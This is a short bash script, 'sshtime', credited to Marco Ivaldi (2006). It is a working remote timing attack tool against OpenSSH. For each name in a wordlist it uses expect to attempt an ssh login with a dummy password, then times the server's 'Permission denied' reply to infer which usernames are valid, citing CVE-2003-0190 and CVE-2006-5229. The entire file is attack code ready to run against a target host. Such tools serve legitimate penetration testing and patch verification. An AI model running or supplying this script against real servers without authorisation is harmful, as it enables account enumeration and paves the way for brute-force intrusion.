#!/bin/bash

#
# $Id: sshtime,v 1.3 2006/10/11 15:32:31 raptor Exp $
#
# sshtime v0.1 - Simple OpenSSH remote timing attack tool
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# SSHtime is a shell script based on expect meant to remotely analyze timing 
# differences in sshd "Permission denied" replies. Depending on OpenSSH 
# version and configuration, it may lead to disclosure of valid usernames. 
#
# See also: 
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5229
#
# Usage example: 
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#

# Some vars
port=22

# Command line
host=$1
dict=$2

# Local functions
function head() {
	echo ""
	echo "sshtime v0.1 - Simple OpenSSH remote timing attack tool"
	echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
	echo ""
}

function foot() {
	echo ""
	exit 0
}
	
function usage() {
	head
	echo "[make sure the target hostkey has been approved before]"
	echo ""
	echo "usage  : ./sshtime <target> <wordlist>"
	echo "example: ./sshtime 192.168.0.1 dict.txt"
	foot
}

function notfound() {
	head
	echo "error  : expect interpreter not found!"
	foot
}

# Check if expect is there
expect=`which expect 2>/dev/null`
if [ $? -ne 0 ]; then
	notfound
fi

# Input control
if [ -z "$2"  ]; then
	usage
fi

# Perform the bruteforce attack
head

for user in `cat $dict`
do
	echo -ne "$user@$host\t\t"
	(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
done

foot